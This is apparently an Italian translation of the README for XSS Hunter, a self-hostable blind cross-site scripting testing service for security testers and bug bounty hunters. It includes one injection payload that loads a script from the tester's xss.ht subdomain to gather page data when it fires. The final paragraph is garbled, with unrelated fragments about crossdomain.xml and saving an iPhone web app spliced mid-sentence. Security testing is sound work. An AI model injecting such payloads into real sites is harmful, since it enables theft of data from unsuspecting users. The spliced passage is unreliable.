
Il servizio XSS Hunter - una versione portatile di XSSHunter.com
Vedi qui per maggiori informazioni: https://github.com/mandatoryprogrammer/xsshunter-express
Questa è una versione portatile del codice sorgente in esecuzione su https://xsshunter.com. È progettata per essere facilmente installabile su qualsiasi server per professionisti della sicurezza e cacciatori di bug bounty che desiderano testare XSS in modo molto più potente.
Se non vuoi configurare questo software e preferisci semplicemente iniziare a testare, vedi https://xsshunter.com .
Consulta https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ per informazioni su come configurare XSS Hunter sul tuo server.
Dopo la registrazione creerai un dominio breve speciale come yoursubdomain.xss.ht che identifica le tue vulnerabilità XSS e ospita il tuo payload. Utilizzerai quindi questo sottodominio nei tuoi test XSS, usando tentativi di iniezione come "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter servirà automaticamente i probe XSS e raccoglierà le informazioni risultanti quando si attivano.
crossdomain.xml errate su sistemi interni a cui normalmente non si potrebbe accedere./app e salvare la pagina come applicazione web sul desktop del tuo iPhone.Tutto il codice è stato creato da me e (per questo motivo) probabilmente non è una best practice e sicuramente necessita di ottimizzazione/pulizia. Ogni pull request è gradita!